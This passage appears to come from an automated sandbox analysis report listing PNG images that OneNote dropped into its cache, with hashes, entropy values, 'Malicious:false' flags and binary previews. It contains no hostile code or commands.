                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
